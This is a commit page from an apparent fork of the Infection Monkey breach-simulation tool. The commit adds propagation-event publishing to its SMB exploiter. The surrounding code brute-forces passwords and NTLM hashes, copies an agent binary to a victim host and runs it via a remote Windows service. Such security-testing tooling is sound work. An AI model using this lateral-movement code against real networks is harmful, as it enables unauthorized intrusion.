p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Publish propagation events

This commit is contained in:
Kekoa Kaaikala 2022-10-06 16:25:18 +00:00
parent c631755397
commit 7b13817b66
1 changed files with 11 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
monkey/infection_monkey/exploit/smbexec.py
View File

@ -69,7 +69,7 @@ class SMBExploiter(HostExploiter):
def _exploit_host(self): def _exploit_host(self):
dest_path = get_agent_dst_path(self.host) dest_path = get_agent_dst_path(self.host)
remote_full_path, creds = self._exploit(dest_path) remote_full_path, creds, timestamp = self._exploit(dest_path)
if not self.exploit_result.exploitation_success: if not self.exploit_result.exploitation_success:
if self._is_interrupted(): if self._is_interrupted():
@ -93,7 +93,7 @@ class SMBExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
self._run_agent_on_victim(scmr_rpc, cmdline) self._run_agent_on_victim(scmr_rpc, cmdline, timestamp)
logger.info( logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)", "Executed monkey '%s' on remote victim %r (cmdline=%r)",
@ -112,7 +112,7 @@ class SMBExploiter(HostExploiter):
) )
return self.exploit_result return self.exploit_result
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]: def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials, float]:
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
creds = generate_brute_force_combinations(self.options["credentials"]) creds = generate_brute_force_combinations(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt): for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
@ -163,7 +163,7 @@ class SMBExploiter(HostExploiter):
self._publish_exploitation_event(timestamp, False, error_message=message) self._publish_exploitation_event(timestamp, False, error_message=message)
continue continue
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash) return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash), timestamp
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str: def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
if remote_full_path.lower() != str(dest_path).lower(): if remote_full_path.lower() != str(dest_path).lower():
@ -220,7 +220,7 @@ class SMBExploiter(HostExploiter):
return None return None
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str): def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str, start_time: float):
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(scmr_rpc) resp = scmr.hROpenSCManagerW(scmr_rpc)
sc_handle = resp["lpScHandle"] sc_handle = resp["lpScHandle"]
@ -239,15 +239,19 @@ class SMBExploiter(HostExploiter):
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME) resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
else: else:
self.exploit_result.error_message = str(err) self.exploit_result.error_message = str(err)
return self.exploit_result self._publish_propagation_event(start_time, False, error_message=str(err))
return
service = resp["lpServiceHandle"] service = resp["lpServiceHandle"]
try: try:
scmr.hRStartServiceW(scmr_rpc, service) scmr.hRStartServiceW(scmr_rpc, service)
self._publish_propagation_event(start_time, True)
status = ScanStatus.USED status = ScanStatus.USED
except Exception: except Exception:
message = "Failed to start the service"
self._publish_propagation_event(start_time, False, error_message=message)
status = ScanStatus.SCANNED status = ScanStatus.SCANNED
pass
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB)) self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
scmr.hRDeleteService(scmr_rpc, service) scmr.hRDeleteService(scmr_rpc, service)
scmr.hRCloseServiceHandle(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service)